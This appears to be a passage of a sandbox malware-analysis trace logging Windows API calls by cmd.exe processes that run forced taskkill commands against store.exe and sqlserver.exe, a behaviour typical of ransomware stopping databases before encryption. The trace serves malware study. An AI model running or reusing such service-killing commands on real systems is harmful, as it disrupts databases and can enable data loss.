[0053.037] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0053.037] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0053.037] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0053.037] ??_V@YAXPAX@Z () returned 0x1 [0053.037] GetProcessHeap () returned 0x670000 [0053.037] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xffd6) returned 0x678d60 [0053.038] GetProcessHeap () returned 0x670000 [0053.038] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x58) returned 0x677b20 [0053.038] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0053.038] malloc (_Size=0xffce) returned 0x892610 [0053.038] ??_V@YAXPAX@Z () returned 0x4ff2f4 [0053.039] GetProcessHeap () returned 0x670000 [0053.039] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1ffa4) returned 0x688d40 [0053.040] SetErrorMode (uMode=0x0) returned 0x0 [0053.041] SetErrorMode (uMode=0x1) returned 0x0 [0053.041] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x688d48, lpFilePart=0x4ff314 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x4ff314*="Desktop") returned 0x17 [0053.041] SetErrorMode (uMode=0x0) returned 0x1 [0053.041] GetProcessHeap () returned 0x670000 [0053.041] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x688d40, Size=0x52) returned 0x688d40 [0053.041] GetProcessHeap () returned 0x670000 [0053.041] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x688d40) returned 0x52 [0053.041] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0053.041] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0053.041] GetProcessHeap () returned 0x670000 [0053.041] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x1b4) returned 0x677b80 [0053.041] GetProcessHeap () returned 0x670000 [0053.041] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x360) returned 0x677d40 [0053.048] GetProcessHeap () returned 0x670000 [0053.048] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x677d40, Size=0x1b6) returned 0x677d40 [0053.048] GetProcessHeap () returned 0x670000 [0053.048] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x677d40) returned 0x1b6 [0053.048] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0053.048] GetProcessHeap () returned 0x670000 [0053.048] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xe0) returned 0x677f00 [0053.048] GetProcessHeap () returned 0x670000 [0053.048] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x677f00, Size=0x76) returned 0x677f00 [0053.048] GetProcessHeap () returned 0x670000 [0053.048] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x677f00) returned 0x76 [0053.049] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.049] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\taskkill.exe", fInfoLevelId=0x1, lpFindFileData=0x4ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff0c0) returned 0xffffffff [0053.049] GetLastError () returned 0x2 [0053.049] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\taskkill.exe.*", fInfoLevelId=0x1, lpFindFileData=0x4ff0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff0a0) returned 0xffffffff [0053.049] GetLastError () returned 0x2 [0053.050] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.050] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\taskkill.exe", fInfoLevelId=0x1, lpFindFileData=0x4ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff0c0) returned 0xffffffff [0053.050] GetLastError () returned 0x2 [0053.050] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\taskkill.exe.*", fInfoLevelId=0x1, lpFindFileData=0x4ff0a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff0a0) returned 0xffffffff [0053.050] GetLastError () returned 0x2 [0053.050] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.050] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\taskkill.exe", fInfoLevelId=0x1, lpFindFileData=0x4ff0c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4ff0c0) returned 0x677f80 [0053.050] GetProcessHeap () returned 0x670000 [0053.050] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x14) returned 0x677fc0 [0053.050] FindClose (in: hFindFile=0x677f80 | out: hFindFile=0x677f80) returned 1 [0053.051] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0053.051] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0053.051] ??_V@YAXPAX@Z () returned 0x1 [0053.051] GetConsoleTitleW (in: lpConsoleTitle=0x4ff5a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0053.051] InitializeProcThreadAttributeList (in: lpAttributeList=0x4ff4d0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4ff4bc | out: lpAttributeList=0x4ff4d0, lpSize=0x4ff4bc) returned 1 [0053.051] UpdateProcThreadAttribute (in: lpAttributeList=0x4ff4d0, dwFlags=0x0, Attribute=0x60001, lpValue=0x4ff4b8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4ff4d0, lpPreviousValue=0x0) returned 1 [0053.051] GetStartupInfoW (in: lpStartupInfo=0x4ff508 | out: lpStartupInfo=0x4ff508*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0053.051] GetProcessHeap () returned 0x670000 [0053.051] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x18) returned 0x677f80 [0053.051] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0053.051] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0053.051] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0053.051] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0053.051] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0053.051] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0053.051] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0053.051] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0053.051] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0053.051] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0053.052] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0053.052] GetProcessHeap () returned 0x670000 [0053.052] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x677f80) returned 1 [0053.052] GetProcessHeap () returned 0x670000 [0053.053] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xa) returned 0x677f80 [0053.053] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0053.054] _get_osfhandle (_FileHandle=1) returned 0x90 [0053.054] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0053.054] _get_osfhandle (_FileHandle=0) returned 0x8c [0053.054] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0053.055] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\taskkill.exe", lpCommandLine="taskkill.exe taskkill /f /im store.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x4ff458*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill.exe taskkill /f /im store.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4ff4a4 | out: lpCommandLine="taskkill.exe taskkill /f /im store.exe", lpProcessInformation=0x4ff4a4*(hProcess=0xe0, hThread=0xdc, dwProcessId=0x42c, dwThreadId=0xf64)) returned 1 [0053.247] CloseHandle (hObject=0xdc) returned 1 [0053.247] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0053.247] GetProcessHeap () returned 0x670000 [0053.247] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x676c58) returned 1 [0053.247] GetEnvironmentStringsW () returned 0x676c58* [0053.247] GetProcessHeap () returned 0x670000 [0053.247] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xb1a) returned 0x674bd0 [0053.247] FreeEnvironmentStringsA (penv="=") returned 1 [0053.247] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0060.633] GetExitCodeProcess (in: hProcess=0xe0, lpExitCode=0x4ff43c | out: lpExitCode=0x4ff43c*=0x1) returned 1 [0060.688] CloseHandle (hObject=0xe0) returned 1 [0060.688] _vsnwprintf (in: _Buffer=0x4ff524, _BufferCount=0x13, _Format="%08X", _ArgList=0x4ff444 | out: _Buffer="00000001") returned 8 [0060.688] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0060.689] GetProcessHeap () returned 0x670000 [0060.689] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x674bd0) returned 1 [0060.690] GetEnvironmentStringsW () returned 0x6781f8* [0060.690] GetProcessHeap () returned 0x670000 [0060.690] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xb40) returned 0x674bd0 [0060.690] FreeEnvironmentStringsA (penv="=") returned 1 [0060.690] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0060.690] GetProcessHeap () returned 0x670000 [0060.690] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x674bd0) returned 1 [0060.690] GetEnvironmentStringsW () returned 0x6781f8* [0060.690] GetProcessHeap () returned 0x670000 [0060.690] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xb40) returned 0x674bd0 [0060.690] FreeEnvironmentStringsA (penv="=") returned 1 [0060.690] GetProcessHeap () returned 0x670000 [0060.690] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x677f80) returned 1 [0060.690] DeleteProcThreadAttributeList (in: lpAttributeList=0x4ff4d0 | out: lpAttributeList=0x4ff4d0) [0060.690] ??_V@YAXPAX@Z () returned 0x1 [0060.690] _get_osfhandle (_FileHandle=1) returned 0x90 [0060.690] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0060.938] _get_osfhandle (_FileHandle=1) returned 0x90 [0060.938] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe23890 | out: lpMode=0xe23890) returned 1 [0061.266] _get_osfhandle (_FileHandle=1) returned 0x90 [0061.266] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0061.533] _get_osfhandle (_FileHandle=0) returned 0x8c [0061.533] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23894 | out: lpMode=0xe23894) returned 1 [0061.807] _get_osfhandle (_FileHandle=0) returned 0x8c [0061.807] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0061.961] SetConsoleInputExeNameW () returned 0x1 [0061.962] GetConsoleOutputCP () returned 0x1b5 [0062.341] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0062.343] SetThreadUILanguage (LangId=0x0) returned 0x3f0409 [0062.455] exit (_Code=1) [0062.455] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 43 os_tid = 0xaf0 Process: id = "9" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7ac9000" os_pid = "0xc04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x9b0" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 38 os_tid = 0x6cc Thread: id = 39 os_tid = 0x7f0 Thread: id = 40 os_tid = 0xd0c Thread: id = 41 os_tid = 0xd48 Thread: id = 42 os_tid = 0x9e0 Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x5a5b000" os_pid = "0x4b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb08" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill.exe taskkill /f /im sqlserver.exe" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 44 os_tid = 0xfa4 [0053.008] GetModuleHandleA (lpModuleName=0x0) returned 0xdf0000 [0053.009] __set_app_type (_Type=0x1) [0053.009] __p__fmode () returned 0x77ae3c14 [0053.009] __p__commode () returned 0x77ae49ec [0053.009] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe06fd0) returned 0x0 [0053.009] __getmainargs (in: _Argc=0xe1d1a4, _Argv=0xe1d1a8, _Env=0xe1d1ac, _DoWildCard=0, _StartInfo=0xe1d1b8 | out: _Argc=0xe1d1a4, _Argv=0xe1d1a8, _Env=0xe1d1ac) returned 0 [0053.009] _onexit (_Func=0xe08030) returned 0xe08030 [0053.009] _onexit (_Func=0xe08040) returned 0xe08040 [0053.009] _onexit (_Func=0xe08050) returned 0xe08050 [0053.009] _onexit (_Func=0xe08060) returned 0xe08060 [0053.009] _onexit (_Func=0xe08070) returned 0xe08070 [0053.010] _onexit (_Func=0xe08080) returned 0xe08080 [0053.010] GetCurrentThreadId () returned 0xfa4 [0053.010] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfa4) returned 0xbc [0053.010] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0053.010] GetProcAddress (hModule=0x75e90000, lpProcName="SetThreadUILanguage") returned 0x75ea4f70 [0053.010] SetThreadUILanguage (LangId=0x0) returned 0x3060409 [0053.028] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0053.028] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2fdfd28 | out: phkResult=0x2fdfd28*=0x0) returned 0x2 [0053.028] VirtualQuery (in: lpAddress=0x2fdfd33, lpBuffer=0x2fdfce0, dwLength=0x1c | out: lpBuffer=0x2fdfce0*(BaseAddress=0x2fdf000, AllocationBase=0x2ee0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.028] VirtualQuery (in: lpAddress=0x2ee0000, lpBuffer=0x2fdfce0, dwLength=0x1c | out: lpBuffer=0x2fdfce0*(BaseAddress=0x2ee0000, AllocationBase=0x2ee0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0053.028] VirtualQuery (in: lpAddress=0x2ee1000, lpBuffer=0x2fdfce0, dwLength=0x1c | out: lpBuffer=0x2fdfce0*(BaseAddress=0x2ee1000, AllocationBase=0x2ee0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0053.028] VirtualQuery (in: lpAddress=0x2ee3000, lpBuffer=0x2fdfce0, dwLength=0x1c | out: lpBuffer=0x2fdfce0*(BaseAddress=0x2ee3000, AllocationBase=0x2ee0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.028] VirtualQuery (in: lpAddress=0x2fe0000, lpBuffer=0x2fdfce0, dwLength=0x1c | out: lpBuffer=0x2fdfce0*(BaseAddress=0x2fe0000, AllocationBase=0x2fe0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0053.028] GetConsoleOutputCP () returned 0x1b5 [0053.245] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0053.245] SetConsoleCtrlHandler (HandlerRoutine=0xe17260, Add=1) returned 1 [0053.246] _get_osfhandle (_FileHandle=1) returned 0x90 [0053.246] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe2388c | out: lpMode=0xe2388c) returned 1 [0053.298] _get_osfhandle (_FileHandle=0) returned 0x8c [0053.299] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23888 | out: lpMode=0xe23888) returned 1 [0053.374] _get_osfhandle (_FileHandle=1) returned 0x90 [0053.374] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0053.794] _get_osfhandle (_FileHandle=1) returned 0x90 [0053.794] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe23890 | out: lpMode=0xe23890) returned 1 [0053.966] _get_osfhandle (_FileHandle=1) returned 0x90 [0053.967] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0054.101] _get_osfhandle (_FileHandle=0) returned 0x8c [0054.101] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23894 | out: lpMode=0xe23894) returned 1 [0054.159] _get_osfhandle (_FileHandle=0) returned 0x8c [0054.159] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0054.215] GetEnvironmentStringsW () returned 0x3274bd8* [0054.215] GetProcessHeap () returned 0x3270000 [0054.215] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0xaca) returned 0x32756b0 [0054.216] FreeEnvironmentStringsA (penv="A") returned 1 [0054.216] GetProcessHeap () returned 0x3270000 [0054.216] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0x4) returned 0x32746b8 [0054.216] GetEnvironmentStringsW () returned 0x3274bd8* [0054.216] GetProcessHeap () returned 0x3270000 [0054.216] RtlAllocateHeap (HeapHandle=0x3270000, Flags=0x8, Size=0xaca) returned 0x3276188 [0054.216] FreeEnvironmentStringsA (penv="A") returned 1 [0054.216] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2fdec84 | out: phkResult=0x2fdec84*=0xcc) returned 0x0 [0054.216] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2fdec8c, lpData=0x2fdec90, lpcbData=0x2fdec88*=0x1000 | out: lpType=0x2fdec8c*=0x0, lpData=0x2fdec90*=0xa0, lpcbData=0x2fdec88*=0x1000) returned 0x2 [0054.216] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2fdec8c, lpData=0x2fdec90, lpcbData=0x2fdec88*=0x1000 | out: lpType=0x2fdec8c*=0x4, lpData=0x2fdec90*=0x1, lpcbData=0x2fdec88*=0x4) returned 0x0 [0054.216] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2fdec8c, lpData=0x2fdec90, lpcbData=0x2fdec88*=0x1000 | out: lpType=0x2fdec8c*=0x0, lpData=0x2fdec90*=0x1, lpcbData=0x2fdec88*=0x1000) returned 0x2 [0054.216] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2fdec8c, lpData=0x2fdec90, lpcbData=0x2fdec88*=0x1000 | out: lpType=0x2fdec8c*=0x4, lpData=0x2fdec90*=0x0, lpcbData=0x2fdec88*=0x4) returned 0x0 [0054.216] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2fdec8c, lpData=0x2fdec90, lpcbData=0x2fdec88*=0x1000 | out: lpType=0x2fdec8c*=0x4, lpData=0x2fdec90*=0x40, lpcbData=0x2fdec88*=0x4) returned 0x0 [0054.216] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2fdec8c, lpData=0x2fdec90, lpcbData=0x2fdec88*=0x1000 | out: lpType=0x2fdec8c*=0x4, lpData=0x2fdec90*=0x40, lpcbData=0x2fdec88*=0x4) returned 0x0 [0054.217] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2fdec8c, lpData=0x2fdec90, lpcbData=0x2fdec88*=0x1000 | out: lpType=0x2fdec8c*=0x0, lpData=0x2fdec90*=0x40, lpcbData=0x2fdec88*=0x1000) returned 0x2 [0054.217] RegCloseKey (hKey=0xcc) returned 0x0 [0054.217] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2fdec84 | out: phkResult=0x2fdec84*=0xcc) returned 0x0 [0054.217] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2fdec8c, lpData=0x2fdec90, lpcbData=0x2fdec88*=0x1000 | out: lpType=0x2fdec8c*=0x0, lpData=0x2fdec90*=0x40, lpcbData=0x2fdec88*=0x1000) returned 0x2 [0054.217] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2fdec8c, lpData=0x2fdec90, lpcbData=0x2fdec88*=0x1000 | out: lpType=0x2fdec8c*=0x4, lpData=0x2fdec90*=0x1, lpcbData=0x2fdec88*=0x4) returned 0x0 [0054.217] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2fdec8c, lpData=0x2fdec90, lpcbData=0x2fdec88*=0x1000 | out: lpType=0x2fdec8c*=0x0, lpData=0x2fdec90*=0x1, lpcbData=0x2fdec88*=0x1000) returned 0x2 [0054.217] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2fdec8c, lpData=0x2fdec90, lpcbData=0x2fdec88*=0x1000 | out: lpType=0x2fdec8c*=0x4, lpData=0x2fdec90*=0x0, lpcbData=0x2fdec88*=0x4) returned 0x0 [0054.217] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2fdec8c, lpData=0x2fdec90, lpcbData=0x2fdec88*=0x1000 | out: lpType=0x2fdec8c*=0x4, lpData=0x2fdec90*=0x9, lpcbData=0x2fdec88*=0x4) returned 0x0 [0054.217] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2fdec8c, lpData=0x2fdec90, lpcbData=0x2fdec88*=0x1000 | out: lpType=0x2fdec8c*=0x4, lpData=0x2fdec90*=0x9, lpcbData=0x2fdec88*=0x4) returned 0x0 [0054.217] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2fdec8c, lpData=0x2fdec90, lpcbData=0x2fdec88*=0x1000 | out: lpType=0x2fdec8c*=0x0, lpData=0x2fdec90*=0x9, lpcbData=0x2fdec88*=0x1000) returned 0x2 [0054.217] RegCloseKey (hKey=0xcc) returned 0x0 [0054.217] time (in: timer=0x0 | out: timer=0x0) returned 0x5d302275 [0054.217] srand (_Seed=0x5d302275) [0054.217] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill.exe taskkill /f /im sqlserver.exe" [0054.217] malloc (_Size=0x4000) returned 0x36c21f0 [0054.218] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill.exe taskkill /f /im sqlserver.exe" [0054.218] malloc (_Size=0xffce) returned 